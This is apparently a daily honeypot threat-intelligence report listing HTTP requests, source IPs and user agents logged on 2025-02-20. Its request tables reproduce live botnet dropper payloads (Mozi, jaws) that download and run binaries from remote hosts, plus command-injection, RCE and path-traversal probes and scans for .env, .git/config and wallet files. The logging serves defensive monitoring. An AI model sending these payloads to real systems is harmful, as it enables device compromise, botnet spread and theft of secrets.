Skip to main content
  1. Daily-Posts/

Report: 2025-02-20

·3877 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-02-20
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
PLDubai
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
221.15.186.233GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.186.233:58183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.230.66.27GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.27:10529/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
121.231.99.27GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.231.99.27:57203/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
27.215.84.91GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.215.84.91:51040/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
39.87.13.136GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.87.13.136:59404/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
219.73.115.226GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
77.239.220.143GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
115.236.79.230GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
219.77.30.173GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
91.224.92.10POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

list_of_source_IP_addresses
#

number_of_occurenceremote_addr
09891.224.92.10
17245.148.10.90
260193.68.89.10
35845.148.10.34
445152.32.172.115
545116.196.87.121
645171.244.40.20
74545.116.77.28
83992.255.57.58
935141.255.166.90
1032193.68.89.51
1128151.115.96.143
1226185.16.38.107
1320176.65.137.182
1417195.178.110.163
1516194.120.230.215
161580.82.77.202
171393.174.93.12
1812115.231.78.11
1912161.35.181.13
2012134.199.158.187
211078.153.140.149
229196.251.72.73
23946.19.138.210
248178.211.139.120
258174.138.62.1
2683.14.9.161
27841.216.188.18
28846.19.143.10
298193.23.3.37
30664.23.201.216
3153.19.65.144
325157.245.45.5
33518.222.142.117
345123.160.223.73
35534.201.23.93
365207.90.244.3
375185.189.182.234
385172.245.40.162
39518.188.117.89
405143.198.50.113
414179.43.191.146
424193.68.89.31
434185.242.226.10
444196.251.70.31
454196.251.118.68
464129.146.60.2
474185.247.137.224
4844.247.129.170
493103.139.45.123
50347.239.167.2
51350.193.186.74
523150.107.38.40
533104.234.115.69
54345.92.19.136
55365.49.20.66
56374.82.47.2
573123.160.223.74
583165.154.11.210
593165.154.11.247
60365.49.20.68
613167.94.138.125
623162.142.125.214
63346.19.143.26
643167.94.138.195
652138.68.139.95
662170.203.143.191
672185.16.36.157
68275.131.174.170
692167.86.121.18
702206.168.34.70
712206.168.34.213
722167.94.145.110
732167.94.138.49
7425.101.0.66
752139.59.169.154
762205.210.31.216
772167.94.138.192
782168.253.90.155
792172.104.11.4
802176.65.142.130
812167.94.145.106
822167.94.145.104
83291.225.218.111
842203.55.131.3
85245.79.181.223
86237.46.113.235
872172.206.141.170
88264.62.197.224
892185.242.226.115
90245.156.128.45
912185.242.226.80
922121.231.99.27
932198.235.24.209
94278.153.140.148
95292.246.87.21
962123.160.223.75
972185.242.226.153
982147.185.132.93
99271.6.134.235
100245.148.10.186
1012106.1.175.70
1022205.210.31.224
103251.254.59.113
104134.77.196.179
1051103.138.4.16
1061198.235.24.72
107146.52.164.170
1081194.233.85.71
1091118.194.250.95
1101177.7.160.254
1111125.228.157.93
1121185.247.137.220
1131172.206.141.246
1141135.148.25.122
1151135.148.25.127
1161103.253.154.185
117143.153.10.13
11818.221.140.46
11911.34.126.178
120136.91.220.34
1211102.141.9.154
122164.62.197.214
123164.62.197.94
1241194.85.251.34
1251114.35.175.166
1261114.35.124.60
1271172.105.128.11
12812.45.168.11
1291114.33.143.118
1301217.142.184.125
1311111.7.96.172
1321123.160.223.72
133180.82.70.133
134169.164.217.245
1351213.32.32.84
1361219.77.30.173
137159.126.254.42
1381220.134.152.134
1391151.249.107.219
140146.109.67.118
141151.254.0.10
142137.59.165.80
1431104.152.52.235
1441163.172.53.10
1451185.124.180.190
146166.240.205.34
147147.237.115.100
148159.126.136.199
149191.82.63.76
150151.81.181.169
1511147.135.85.131
1521220.133.162.246
1531178.19.174.250
1541168.232.14.24
155194.248.130.235
156152.29.55.190
157159.127.84.223
1581213.32.32.93
159191.196.152.31
160191.196.152.25
1611221.122.67.75
162145.156.128.47
1631196.251.69.18
1641114.33.126.178
1651185.147.124.49
166145.156.128.130
167162.64.9.53
1681103.184.194.245
169182.99.230.98
1701205.196.214.14
171168.183.137.128
1721220.132.99.110
1731147.185.133.185
174147.89.193.162
1751205.210.31.219
1761147.185.133.140
177145.156.130.45
17815.202.114.105
1791170.106.113.159
180164.62.156.22
181134.22.192.129
182164.62.156.10
183164.62.156.20
1841219.73.115.226
185164.62.197.186
1861125.228.130.9
1871146.70.201.212
188147.88.87.97
189146.139.110.45
190136.66.231.15
1911162.216.150.22
1921198.235.24.222
1931103.203.56.2
1941162.216.150.58
1951221.15.186.233
196145.230.66.27
1971198.235.24.150
198139.87.13.136
1991122.117.239.244
200159.127.95.120
201127.215.84.91
2021162.215.216.231
203113.64.49.213
2041103.42.201.36
205186.142.49.77
206191.214.84.225
2071117.198.13.201
2081172.104.11.34
209145.156.130.4
210164.62.156.86
211118.218.241.81
2121147.185.132.236
2131198.235.24.85
2141115.236.79.230
2151174.138.61.44
216145.156.128.126
217195.32.8.245
2181184.105.247.194
2191162.216.150.80
220177.239.220.143
221145.156.128.41
222134.77.181.91
2231196.251.66.193
224135.203.211.143
2251147.185.132.39
2261103.207.125.55
2271220.133.134.26
22812.58.56.13
229167.243.143.203
2301120.61.28.83
2311125.228.91.168
2321198.235.24.88
233166.94.102.10
2341165.84.166.194
2351104.152.52.241
236151.15.21.147
2371172.168.159.108
238145.164.177.158
239145.164.177.7

user_agent
#

number_of_occurenceuser_agent
0219-
1172Custom-AsyncHttpClient
2132l9explore/1.2.2
3116Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
498Mozila/5.0
536Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
628curl/7.88.1
724Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3
820Mozilla/5.0 (X11; Linux x86_64)
914Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
1012Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36
1112Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1211Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1311Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1410Mozilla/5.0 (compatible)
159Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
169Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
179Mozilla/5.0
188Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
198xfa1
208Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
218Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
228Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
238Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
248Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
256Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
265l9tcpid/v1.1.0
275Mozilla/5.0 (Linux; Android 9; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
285Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
295Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
304Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
314Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
324ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)
334Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
343Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
353Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3
363python-requests/2.32.3
373Mozilla/5.0 zgrab/0.x
383Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
393Hello, world
403SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1
412Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
422Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
432curl/8.1.2
442Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
452Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
462Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
472Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
482Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
492Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.901 Yowser/2.5 Safari/537.36
502Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
512Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
522Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
532python-requests/2.26.0
542Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
552Java/20.0.1
562Mozilla/5.0 (Linux; Android 7.0; LG-H820) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
572masscan/1.3 (https://github.com/robertdavidgraham/masscan)
582Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36
592Go-http-client/1.1
602Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
612Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
621‘Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)’
631Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
641Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
651Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116
661Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
671Mozilla/5.0 (Linux; Android 8.1.0; GM 6 d) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
681Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
691Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
701POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1
711Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
721curl/7.64.1
731Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
741‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36’
751Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
761Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
771Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/2.30.6
781Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36
791Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
801Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
811Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0
821Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
831Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36
841Mozilla/5.0 (Linux; Android 8.0.0; XT1650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36
851Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
861Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
871Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9
881Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
891Mozilla/3.01Gold (Win95; I)
901Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
911Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36
921Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
931Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
941Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12
951Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3
961Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/1.10.1 Mobile/15E148
971Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko
981Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263
991Mozilla/5.0 (Linux; Android 8.1; PBBM00 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.345.00 Mobile Safari/537.36
1001Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
1011Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
1021Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1
1031Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1
1041CSSCheck/1.2.2
1051Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
1061curl/7.29.0
1071Mozilla/5.0 (Linux; Android 9; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1081Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
1091Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1_2) AppleWebKit/555.42 (KHTML, like Gecko) Chrome/71.0.1699 Safari/537.36
1101Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
1111Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36
1121Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
1131Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70
1141Mozilla/5.0 (Linux; Android 4.4.2; GT-N8000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36
1151Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
1161Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
1171Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1181Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
1191Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
1201Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1
1211Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
1221Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28
1231curl/7.81.0
1241r00ts3c-owned-you
1251Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0
1261HTTP Banner Detection (https://security.ipip.net)
1271Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
1281masscan/1.0 (https://github.com/robertdavidgraham/masscan)
1291Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36

request
#

number_of_occurencerequest
0308GET / HTTP/1.1
198POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
255GET / HTTP/1.0
340GET /.env HTTP/1.1
436GET /cgi-bin/luci/;stok=/locale HTTP/1.1
522GET /favicon.ico HTTP/1.1
621GET /.git/config HTTP/1.1
720GET /json/wallet.json HTTP/1.1
815\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
912POST / HTTP/1.1
106GET /admin/assets/js/views/login.js HTTP/1.0
116GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
125MGLNDD_xxx.xxx.xxx.xxx_80
135SSH-2.0-Go
145GET /login.html HTTP/1.1
155\x16\x03\x01\x01
165GET /geoserver/web/ HTTP/1.1
174GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
184GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
194GET /containers/json HTTP/1.1
204GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
214GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
224GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
234GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
244GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
254GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
264GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
274GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
284GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
294GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
304GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
314GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
324GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
334POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
344POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
354POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
364GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1
374GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
384GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
394GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
404GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
414GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
424GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
434GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
444GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
454GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
464GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
474GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
484GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
494GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
504GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
514GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
524GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
534GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1
544GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
554GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
564GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
574GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
584GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
594GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
604GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
614GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
624GET /actuator/gateway/routes HTTP/1.1
633GET /devops/.git/config HTTP/1.1
643GET /_ignition/execute-solution HTTP/1.1
653GET /console/ HTTP/1.1
663GET /.env.secret HTTP/1.1
673GET /staging_area/.git/config HTTP/1.1
683GET /public/.git/config HTTP/1.1
693GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
703GET /configuration/.env HTTP/1.1
713GET /core/.git/config HTTP/1.1
722POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
732GET /user/.git/config HTTP/1.1
742GET /.env.stage HTTP/1.1
752GET /Media/Images/1801359D.PNG HTTP/1.1
762GET /Media/Images/BF8AD73A.PNG HTTP/1.1
772GET /api/.git/config HTTP/1.1
782GET /geoserver HTTP/1.1
792GET /.env.backup HTTP/1.1
802GET /solr/admin/info/system?wt=json HTTP/1.1
